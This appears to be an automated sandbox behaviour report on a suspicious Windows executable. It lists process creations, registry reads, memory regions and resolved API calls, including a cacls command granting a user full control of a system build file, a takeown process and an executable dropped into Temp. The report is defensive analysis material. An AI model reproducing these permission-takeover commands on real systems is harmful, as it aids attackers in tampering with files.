| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x7bc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x6d0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xc5c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "ImagingDevices.exe.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "ImagingDevices.exe.mui" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #118: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #118 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:37, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdf8 |
| Parent PID | 0x858 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E00
0x
CB0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000160000 | 0x00160000 | 0x0017ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x0016ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00173fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00181fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00183fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00233fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00240fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00251fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00260000 | 0x0031dfff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe.mui | 0x00320000 | 0x00321fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x0483ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04840000 | 0x04b76fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74260000 | 0x74287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f310000 | 0x7f310000 | 0x7f40ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f410000 | 0x7f410000 | 0x7f432fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f436000 | 0x7f436000 | 0x7f438fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f439000 | 0x7f439000 | 0x7f439fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f43c000 | 0x7f43c000 | 0x7f43efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f43f000 | 0x7f43f000 | 0x7f43ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #119: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #119 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "blank.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:41, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe08 |
| Parent PID | 0x3c8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E0C
0x
F08
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00200000 | 0x002bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x008e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x00a70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a80000 | 0x00a80000 | 0x01e7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e80000 | 0x01e80000 | 0x0205ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74680000 | 0x74711fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
